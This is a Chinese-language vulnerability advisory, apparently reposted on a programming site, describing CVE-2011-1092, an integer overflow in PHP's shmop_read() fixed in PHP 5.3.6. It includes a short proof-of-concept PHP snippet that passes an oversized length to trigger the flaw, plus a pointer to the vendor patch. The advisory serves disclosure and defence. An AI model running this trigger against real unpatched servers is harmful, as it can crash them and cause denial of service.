发布日期:2011-03-08 更新日期:2011-03-08受影响系统: PHP PHP 5.x 不受影响系统: PHP PHP 5.3.6 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 46786 CVE ID: CVE-2011-1092PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP的"shmop_read()"函数在实现上存在远程整数溢出漏洞,远程攻击者可利用此漏洞在受影响网络服务器中执行任意代码,造成拒绝服务。<*来源:Jose Carlos Norte *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Jose Carlos Norte ()提供了如下测试方法:<?php $shm_key = ftok(__FILE__, "t"); $shm_id = shmop_open($shm_key, "c", 0644, 100); $shm_data = shmop_read($shm_id, 1, 2147483647); //if there is no segmentation fault past this point, we have 2gb of memory! echo $shm_data; ?>建议: -------------------------------------------------------------------------------- 厂商补丁:PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.php.netAdobe Flash Player “SWF”文件远程内存破坏漏洞Linux Kernel Netfilter “ipt_CLUSTERIP.c”缓冲区溢出漏洞相关资讯 PHP
易网时代-编程资源站